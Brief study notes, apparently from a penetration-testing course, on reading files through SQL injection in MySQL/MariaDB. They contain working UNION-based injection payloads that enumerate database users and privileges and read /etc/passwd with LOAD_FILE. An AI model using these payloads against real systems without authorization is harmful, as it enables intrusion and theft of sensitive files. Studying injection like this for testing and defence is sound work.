# Reading files 

## Privileges 

Reading is much more common than writting data 

In some DBMs the DB user must have the file privilege to load a file's cpontent into a table and then dump data from that table and read files. 

## DB user 

* Determine which user we are within the database 

```
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
```

```
cn' UNION SELECT 1, user(), 3, 4-- 
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- 
```

## User Privileges 

what privileges we have that user 

```
SELECT super_priv FROM mysql.user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
```
## Load File 

* [DOCU](https://mariadb.com/kb/en/load_file/)

```
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
```
